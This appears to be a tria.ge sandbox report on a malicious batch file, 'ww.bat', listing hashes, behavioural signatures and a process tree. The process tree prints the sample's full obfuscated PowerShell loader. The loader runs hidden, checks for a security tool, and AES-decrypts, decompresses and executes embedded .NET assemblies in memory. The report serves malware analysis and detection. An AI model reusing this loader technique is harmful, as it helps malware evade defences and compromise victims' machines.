Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
12/09/2024, 07:37
Static task
static1
Behavioral task
behavioral1
Sample
ww.bat
Resource
win7-20240708-en
5 signatures
150 seconds
General
-
Target
ww.bat
-
Size
588KB
-
MD5
df63b5ec4a735892084303fbf770328e
-
SHA1
6eb0d6eda0588cd6157a8844c5daaf40b406429a
-
SHA256
3f3aac5794c2a2b79c0e6da9eb230e4c2131b620e883ab6e9c1b69fa34087548
-
SHA512
8fc074cb243eb431cd4d10dc63dde1208c49f2700f409d4154bbc6a7b14590050caa2262f87166599a2b6cd803eb097ddd828e2e582608d029d50db029bea1ef
-
SSDEEP
12288:HBloXJYKzydKURaKq+gCSq1gQGNBqv+gH776JP/KIOcRoo:7YgKURcWGQH+A3+/H+o
Score
3/10
Malware Config
Signatures
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 804 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 804 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1864 wrote to memory of 2488 1864 cmd.exe 31 PID 1864 wrote to memory of 2488 1864 cmd.exe 31 PID 1864 wrote to memory of 2488 1864 cmd.exe 31 PID 1864 wrote to memory of 804 1864 cmd.exe 32 PID 1864 wrote to memory of 804 1864 cmd.exe 32 PID 1864 wrote to memory of 804 1864 cmd.exe 32 PID 1864 wrote to memory of 804 1864 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ww.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\ww.bat';$pZqp='InvPTptokPTpte'.Replace('PTpt', ''),'LoCiHiadCiHi'.Replace('CiHi', ''),'CrJUeseaJUesteDJUesecrJUesypJUestJUesorJUes'.Replace('JUes', ''),'TrVbHuaVbHunsVbHuforVbHumFiVbHunalVbHuBlVbHuocVbHuk'.Replace('VbHu', ''),'CMYmOoMYmOpyMYmOToMYmO'.Replace('MYmO', ''),'SpXaEblXaEbitXaEb'.Replace('XaEb', ''),'FroNpismBaNpisseNpis64NpisSNpistrNpisinNpisgNpis'.Replace('Npis', ''),'DecoOHTompoOHTroOHTeoOHTsoOHTs'.Replace('oOHT', ''),'ReaGFEGdLGFEGinGFEGesGFEG'.Replace('GFEG', ''),'ElezxgdmenzxgdtzxgdAtzxgd'.Replace('zxgd', ''),'MaTQBGiTQBGnTQBGMoTQBGdTQBGulTQBGe'.Replace('TQBG', ''),'GetwsoICuwsoIrrwsoIenwsoItPrwsoIocwsoIeswsoIswsoI'.Replace('wsoI', ''),'ChaOuTangeOuTaEOuTaxOuTateOuTansiOuTaonOuTa'.Replace('OuTa', ''),'EnEvGPtryEvGPPEvGPoiEvGPnEvGPt'.Replace('EvGP', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($pZqp[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function qIYuI($pXYPC){$vcJFa=[System.Security.Cryptography.Aes]::Create();$vcJFa.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vcJFa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vcJFa.Key=[System.Convert]::($pZqp[6])('RtUoResFzoC7uLDsMNXiqz+4O1P9Lz1x2usQzNAGROg=');$vcJFa.IV=[System.Convert]::($pZqp[6])('Z+pqV7++3qGGLoy90CNOvw==');$pFlAY=$vcJFa.($pZqp[2])();$IfZXr=$pFlAY.($pZqp[3])($pXYPC,0,$pXYPC.Length);$pFlAY.Dispose();$vcJFa.Dispose();$IfZXr;}function objTo($pXYPC){$IAuUa=New-Object System.IO.MemoryStream(,$pXYPC);$jblBX=New-Object System.IO.MemoryStream;$gPOxs=New-Object System.IO.Compression.GZipStream($IAuUa,[IO.Compression.CompressionMode]::($pZqp[7]));$gPOxs.($pZqp[4])($jblBX);$gPOxs.Dispose();$IAuUa.Dispose();$jblBX.Dispose();$jblBX.ToArray();}$rPjBm=[System.IO.File]::($pZqp[8])([Console]::Title);$Kypql=objTo (qIYuI ([Convert]::($pZqp[6])([System.Linq.Enumerable]::($pZqp[9])($rPjBm, 5).Substring(2))));$hvBrU=objTo (qIYuI ([Convert]::($pZqp[6])([System.Linq.Enumerable]::($pZqp[9])($rPjBm, 6).Substring(2))));[System.Reflection.Assembly]::($pZqp[1])([byte[]]$hvBrU).($pZqp[13]).($pZqp[0])($null,$null);[System.Reflection.Assembly]::($pZqp[1])([byte[]]$Kypql).($pZqp[13]).($pZqp[0])($null,$null); "2⤵PID:2488
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-